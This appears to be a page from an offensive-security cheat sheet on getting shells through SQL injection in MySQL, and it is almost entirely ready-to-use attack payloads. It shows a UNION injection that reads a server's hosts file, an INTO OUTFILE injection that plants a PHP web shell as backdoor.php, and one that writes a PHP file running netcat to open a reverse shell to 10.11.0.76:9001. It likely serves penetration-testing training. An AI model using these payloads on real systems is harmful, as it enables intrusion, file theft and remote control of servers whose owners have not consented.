SQL Shells

Reading files from the server (mysql)

load_file function

http://<IP>/comment.php?id=735 union select 1,2,3,4,load_file('C:/windows/system32/drivers/etc/hosts'),6

Code Injection (mysql)

into OUTFILE

http://<IP>/comment.php?id=735 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

then browse to backdoor.php and run a command by appending ?cmd=<cmd>

http://<IP>/backdoor.php

Spawning a shell (mysql)

first start a netcat listener on your attacking system
in this example we will listen on port 9001
next, inject into the get request to connect to our attacking system on 9001 via netcat

http://<IP>/comment.php?id=735 union select 1,2,3,4,"<?php exec('nc.exe 10.11.0.76 9001 -e cmd.exe'); ?>",6 into OUTFILE 'c:/xampp/htdocs/reverse_shell.php'

>>> browse to our file and then check back with netcat for the connection;

PreviousPHP Shells NextOracle Padding Attack

Last updated 1 year ago